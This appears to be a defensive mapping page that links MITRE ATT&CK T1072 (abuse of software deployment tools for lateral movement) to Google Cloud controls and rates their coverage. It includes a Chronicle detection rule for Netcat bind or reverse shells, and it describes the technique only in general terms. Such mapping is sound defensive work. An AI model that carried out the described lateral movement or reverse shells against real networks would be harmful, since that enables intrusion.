1. Home
  2. ATT&CK Techniques
  3. T1072 Software Deployment Tools

T1072 Software Deployment Tools Mappings

Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.).

Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.

View in MITRE ATT&CK®

Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
artifact_registry Artifact Registry technique_scores T1072 Software Deployment Tools
Comments
Once this control is deployed, it can detect variations to store system packages and container images.
References
  1. https://cloud.google.com/container-analysis/docs/container-analysis
  2. https://cloud.google.com/container-analysis/docs/container-scanning-overview
chronicle Chronicle technique_scores T1072 Software Deployment Tools
Comments
Chronicle is able to trigger alerts based off suspicious activity on a Linux host that could indicate a bind or reverse shell with Netcat tool. Note: This rule requires installation of auditbeat on the host machine to properly function. This technique was scored as minimal based on low or uncertain detection coverage factor. https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/linux/possible_bind_or_reverse_shell_via_netcat__auditbeat_for_linux.yaral
References
  1. https://cloud.google.com/chronicle/docs/overview
  2. https://github.com/chronicle/detection-rules
vmmanager VMManager technique_scores T1072 Software Deployment Tools
Comments
VM Manager can apply on-demand and scheduled patches via automated patch deployment. This can remediate OS and software vulnerabilities that could otherwise be exploited. Since VM Manager doesn't directly prevent exploitation of active vulnerabilities (including zero day vulnerabilities) this control has resulted in a score of Partial.
References
  1. https://cloud.google.com/compute/docs/vm-manager